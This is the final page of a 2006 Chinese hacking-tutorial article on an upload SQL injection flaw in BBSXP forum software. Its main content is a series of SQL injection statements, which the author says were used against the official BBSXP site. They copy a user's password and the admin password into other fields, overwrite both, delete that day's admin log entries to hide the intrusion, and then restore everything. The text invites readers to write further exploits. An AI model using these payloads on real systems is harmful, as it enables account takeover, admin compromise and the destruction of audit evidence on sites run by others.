首页 | 业界新闻 | 黑客教程 | 安全漏洞 | 安全文章 | 破解技术 | 技术文摘 | 黑客文化 | 本站原创 | 安全贴吧 | 在线留言 | IP查询 | 软件下载 | 繁体中文 |
您现在的位置: 黑色反击 >> 技术资讯 >> 黑客教程 >> 入侵实例 >> 正文
bbsxp上传注入漏洞
时间:2006-3-24 3:47:06 出处:网络 作者:华仔 编辑:mervin 点击数:

 

 

这里是我测试bbsxp官方网站时使用几个查询语句,供大家参考使用:

 

--备份yuzi的密码到电子邮件中

update BBSXP_Users set UserMail=UserPass where UserName='yuzi'

--备份后台管理密码到yuzi的个人主页中

update BBSXP_Users set UserHome=(select top 1 AdminPassword from BBSXP_SiteSettings) where UserName='yuzi'

--修改yuzi的密码为xxxxxxxxxxxxxxxxx

update BBSXP_Users set UserPass='xxxxxxxxxxxxxxxxx' where UserName='yuzi'

--修改后台管理密码为xxxxxxxxxxxxxxxxx

update BBSXP_SiteSettings set AdminPassword=' xxxxxxxxxxxxxxxxx '

--删除管理员今天登录时所有的操作日志

delete from BBSXP_Log where UserName='yuzi' and cast(DateCreated as nvarchar(10))=cast(getdate() as nvarchar(10))

--恢复后台管理密码

update BBSXP_SiteSettings set AdminPassword=(select UserHome from BBSXP_Users where UserName='yuzi')

--恢复yuzi的密码

update BBSXP_Users set UserPass=UserMail where UserName='yuzi'

--清除作为密码备份的yuzi的电子邮件和个人主页数据

update BBSXP_Users set UserMail='' where UserName='yuzi'

update BBSXP_Users set UserHome='' where UserName='yuzi'

 

在这篇文章中虽然我只是给出了针对SqlServer数据库的注入方法,如果在Exploit中使用针对Access的注入语句的话也是可以的。由于时间关系我也就没有详细的写相关的注入语句,有兴趣的读者可以试一试自己来完成对Access数据库的注入。还有针对NewTopic.aspReTopic.asp两个文件注入的Exploit我也就不再写了,基本上大同小异。如果你有兴趣的话也可以自己写一下给大家分享。

上一页  [1] [2] [3] 

精彩推荐
hack菜鸟入门
VB 从零开始编外挂(完
IPC入侵全接触
QQ跨站漏洞巧利用,强
WinXP中CPU占用100%原
黑客新技术 灰鸽子巧妙
实例讲解 黑客入侵论坛
ADSL共享上网方式大总
BMP文件格式分析
十招教你学会破解
热门软件
网 友 评 论
关于我们 - 联系方式 - 招聘信息 - 合作伙伴 - 网站地图 - 广告服务 - 我要投稿 - 设为首页 - 加入收藏
黑色反击 力倡网络安全,崇尚互联共享,欢迎各种媒体转载我们的原创作品 [转载请注明出处]。
EMAIL:hf110.com@gmail.com 备案:苏ICP备05010002号